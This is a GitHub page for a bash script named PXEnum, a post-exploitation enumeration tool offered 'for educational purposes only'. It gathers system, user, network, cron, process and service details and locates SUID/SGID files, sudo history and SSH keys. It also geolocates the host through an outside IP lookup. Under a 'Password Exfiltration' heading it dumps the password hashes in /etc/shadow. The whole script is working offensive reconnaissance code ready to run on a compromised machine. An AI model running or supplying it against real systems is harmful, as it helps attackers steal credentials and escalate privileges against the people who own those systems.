-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathvertoodo.sh
192 lines (177 loc) · 7.79 KB
/
vertoodo.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
#!/bin/bash
echo "\e[31mPXEnum\e[39m"
echo "\e[31mP\e[39most e\e[31mX\e[39mploitation \e[31mEnum\e[39meration"
echo "\e[31mVersion : \e[39mv1.0"
echo "\e[31mAuthor : \e[39mShawn Duong"
echo "\e[31mEmail : \e[39mshawnduong@protonmail.com"
echo "\e[31mGitHub : \e[39mhttps://github.com/shawnduong"
echo
echo "\e[1;31mDISCLAIMER"
echo "THIS TOOL IS MEANT TO BE USED FOR EDUCATIONAL PURPOSES ONLY."
echo "I AM NOT LIABLE FOR ANY DAMAGES CAUSED BY MISUSE OF THIS SOFTWARE.\e[0;39m"
echo
echo "\e[31m--Basic Info--\e[39m"
user=`whoami` 2>/dev/null
echo "\e[36mLogged in as : \e[39m$user"
host=`uname -n` 2>/dev/null
echo "\e[36mLogged into : \e[39m$host"
home=`echo $HOME` 2>/dev/null
echo "\e[36mHome : \e[39m$home"
uid=`id -u` 2>/dev/null
echo "\e[36mUser ID : \e[39m$uid"
groups=`groups | sort` 2>/dev/null
echo "\e[36mGroups : \e[39m$groups"
kernel=`uname -s` 2>/dev/null
echo "\e[36mKernel : \e[39m$kernel"
release=`uname -r` 2>/dev/null
echo "\e[36mRelease : \e[39m$release"
version=`uname -v` 2>/dev/null
echo "\e[36mVersion : \e[39m$version"
architecture=`uname -p` 2>/dev/null
echo "\e[36mArchitecture : \e[39m$architecture"
os=`uname -o` 2>/dev/null
echo "\e[36mOS : \e[39m$os"
echo
echo "\e[31m--Hardware Info--\e[39m"
cpu=`lscpu | grep 'Model name:' | awk -F ':' '{print $2}' | awk '{$1=$1};1'` 2>/dev/null
echo "\e[36mCPU : \e[39m$cpu"
gpu=`lshw -C display | grep "product:" | awk -F ': ' '{print $2}'` 2>/dev/null
echo "\e[36mGPU : \e[39m$gpu"
echo "\e[36mArchitecture : \e[39m$architecture"
memOnline=`lsmem | grep 'Total online memory:' | awk -F ':' '{print $2}' | awk '{$1=$1};1'` 2>/dev/null
echo "\e[36mOnline memory : \e[39m$memOnline"
memOffline=`lsmem | grep 'Total offline memory:' | awk -F ':' '{print $2}' | awk '{$1=$1};1'` 2>/dev/null
echo "\e[36mOffline memory : \e[39m$memOffline"
echo
echo "\e[31m--BIOS Info--\e[39m"
biosVendor=`dmidecode | grep 'BIOS Information' -A 5 | grep 'Vendor' | awk -F ': ' '{print $2}'` 2>/dev/null
echo "\e[36mBIOS Vendor : \e[39m$biosVendor"
biosVersion=`dmidecode | grep 'BIOS Information' -A 5 | grep 'Version' | awk -F ': ' '{print $2}'` 2>/dev/null
echo "\e[36mBIOS Version : \e[39m$biosVersion"
biosReleaseDate=`dmidecode | grep 'BIOS Information' -A 5 | grep 'Release Date' | awk -F ': ' '{print $2}'` 2>/dev/null
echo "\e[36mBIOS Release Date : \e[39m$biosReleaseDate"
echo
echo "\e[31m--User Info--\e[39m"
users=`awk -F: '{print $1}' /etc/passwd | sort | tr '\n' ' '` 2>/dev/null
echo "\e[36mAll users : \e[39m$users"
groups=`cut -d: -f1 /etc/group | sort | tr '\n' ' '` 2>/dev/null
echo "\e[36mAll groups : \e[39m$groups"
sudoers=`cat /etc/group | grep 'sudo' | awk -F ':' '{print $4}' | tr '\n' ' '` 2>/dev/null
echo "\e[36mSuper users : \e[39m$sudoers"
usersUIDs=`awk -F: '{printf "%s:%s\n",$1,$3}' /etc/passwd | sort | tr '\n' ' '` 2>/dev/null
echo "\e[36mAll users + UIDs : \e[39m$usersUIDs"
onlineUsers=`users` 2>/dev/null
echo "\e[36mLogged in users : \e[39m$onlineUsers"
homedUsers=`cat /etc/passwd | grep '/home/' | awk -F: '{print $1}' | sort | tr '\n' ' '` 2>/dev/null
echo "\e[36mUsers with homes : \e[39m$homedUsers"
userHomes=`cat /etc/passwd | grep '/home/' | awk -F: '{printf "%s:%s\n",$1,$6}' | sort | tr '\n' ' '` 2>/dev/null
echo "\e[36mUser homes : \e[39m$userHomes"
wOut=`w` 2>/dev/null
echo "\e[36mw output : \e[39m"
echo "$wOut"
whoOut=`who` 2>/dev/null
echo "\e[36mwho output : \e[39m"
echo "$whoOut"
echo
echo "\e[31m--Network Info--\e[39m"
interfaces=`ip link show | sed '0~2d' | awk -F ': ' '{print $2}' | sort | tr '\n' ' '` 2>/dev/null
echo "\e[36mNetwork interfaces : \e[39m$interfaces"
macs=`ip -o link | awk '{print $2,$(NF-2)}' | tr '\n' ' '` 2>/dev/null
echo "\e[36mMAC Addresses : \e[39m$macs"
localIPs=`ifconfig | grep 'inet ' | awk -F ' ' '{print $2}' | tr '\n' ' '` 2>/dev/null
echo "\e[36mLocal IP addresses : \e[39m$localIPs"
routerIP=`ip route | grep 'default' | awk -F ' ' '{print $3}'` 2>/dev/null
echo "\e[36mRouter IP addresses : \e[39m$routerIP"
openPorts=`netstat -tulpn | grep 'LISTEN' | awk -F ' ' '{print $4}' | tr '\n' ' '` 2>/dev/null
echo "\e[36mLocally open ports : \e[39m$openPorts"
publicIP=`dig +short myip.opendns.com @resolver1.opendns.com` 2>/dev/null
echo "\e[36mPublic IP address : \e[39m$publicIP"
echo
echo "\e[31m--Location Info (Based on Network)--\e[39m"
info=`curl http://ip-api.com/line/$publicIP` 2>/dev/null
country=`echo "$info" | sed '2!d'` 2>/dev/null
echo "\e[36mCountry : \e[39m$country"
region=`echo "$info" | sed '5!d'` 2>/dev/null
echo "\e[36mRegion : \e[39m$region"
city=`echo "$info" | sed '6!d'` 2>/dev/null
echo "\e[36mCity : \e[39m$city"
zip=`echo "$info" | sed '7!d'` 2>/dev/null
echo "\e[36mZIP Code : \e[39m$zip"
lat=`echo "$info" | sed '8!d'` 2>/dev/null
lon=`echo "$info" | sed '9!d'` 2>/dev/null
echo "\e[36mlat, lon : \e[39m$lat $lon"
timezone=`echo "$info" | sed '10!d'` 2>/dev/null
echo "\e[36mTime zone : \e[39m$timezone"
isp=`echo "$info" | sed '11!d'` 2>/dev/null
echo "\e[36mISP : \e[39m$isp"
organization=`echo "$info" | sed '12!d'` 2>/dev/null
echo "\e[36mOrganization : \e[39m$organization"
asn=`echo "$info" | sed '13!d'` 2>/dev/null
echo "\e[36mAS Number : \e[39m$asn"
echo
echo "\e[31m--Cron Info--\e[39m"
crond=`ls /etc/cron.d/ | tr '\n' ' '` 2>/dev/null
echo "\e[36mcron.d : \e[39m$crond"
cronhourly=`ls /etc/cron.hourly/ | tr '\n' ' '` 2>/dev/null
echo "\e[36mcron.hourly : \e[39m$cronhourly"
crondaily=`ls /etc/cron.daily/ | tr '\n' ' '` 2>/dev/null
echo "\e[36mcron.daily : \e[39m$crondaily"
cronweekly=`ls /etc/cron.weekly/ | tr '\n' ' '` 2>/dev/null
echo "\e[36mcron.weekly : \e[39m$cronweekly"
cronmonthly=`ls /etc/cron.monthly/ | tr '\n' ' '` 2>/dev/null
echo "\e[36mcron.monthly : \e[39m$cronmonthly"
echo
echo "\e[31m--Processes--\e[39m"
echo "\e[36mUser processes (excluding GNOME/KDE) : \e[39m"
echo "\e[36mPID\tProcess\e[39m"
processes=`ps -u | sed '1d' | awk -F ' ' '{printf "%s\t%s\n", $2, $11}' | grep -v 'gnome\|kde'` 2>/dev/null
echo "$processes"
echo
echo "\e[31m--Services--\e[39m"
onlineServices=`service --status-all | grep '\[ + \]'` 2>/dev/null
echo "\e[36mOnline : \e[39m"
echo "$onlineServices"
offlineServices=`service --status-all | grep '\[ - \]'` 2>/dev/null
echo "\e[36mOffline : \e[39m"
echo "$offlineServices"
echo
echo "\e[31m--Password Exfiltration--\e[39m"
passwords=`cat /etc/shadow | grep -v "*\|!" | sort` 2>/dev/null
echo "\e[36mSuccessfully exfiltrated passwords : \e[39m$passwords"
echo
echo "\e[31m--SetUID/SetGID Files--\e[39m"
suidFiles=`find / -perm /6000` 2>/dev/null
echo "\e[36mFound : \e[39m"
echo "$suidFiles"
echo
echo "\e[31m--sudo History--\e[39m"
sudoHistory=`cat ~/.bash_history | grep 'sudo'` 2>/dev/null
echo "\e[36mHistory : \e[39m"
echo "$sudoHistory"
echo
echo "\e[31m--SSH Keys--\e[39m"
foundSSHKeys=`ls ~/.ssh/ | grep '.pub\|rsa' | tr '\n' ' '` 2>/dev/null
echo "\e[36mFound (in ~/.ssh/) : \e[39m$foundSSHKeys"
echo
echo "\e[31m--Program Version Info--\e[39m"
bashV=`bash --version | sed '1!d'` 2>/dev/null
echo "\e[36mBash : \e[39m$bashV"
sudoV=`sudo --version | sed '1!d'` 2>/dev/null
echo "\e[36msudo : \e[39m$sudoV"
gccV=`gcc --version | sed '1!d'` 2>/dev/null
echo "\e[36mGCC : \e[39m$gccV"
printf "\e[36mPython 2 : \e[39m$python2V"
python --version
python3V=`python3 --version` 2>/dev/null
echo "\e[36mPython 3 : \e[39m$python3V"
javaV=`java --version | sed '1!d'` 2>/dev/null
echo "\e[36mJava : \e[39m$javaV"
curlV=`curl --version | sed '1!d' | awk -F ' ' '{printf "%s %s %s", $1, $2, $3}'` 2>/dev/null
echo "\e[36mcURL : \e[39m$curlV"
wgetV=`wget --version | sed '1!d'` 2>/dev/null
echo "\e[36mwget : \e[39m$wgetV"
rubyV=`ruby --version` 2>/dev/null
echo "\e[36mRuby : \e[39m$rubyV"
apache2V=`apache2 -v | sed '1!d' | awk -F ': ' '{print $2}'` 2>/dev/null
echo "\e[36mApache 2 : \e[39m$apache2V"
echo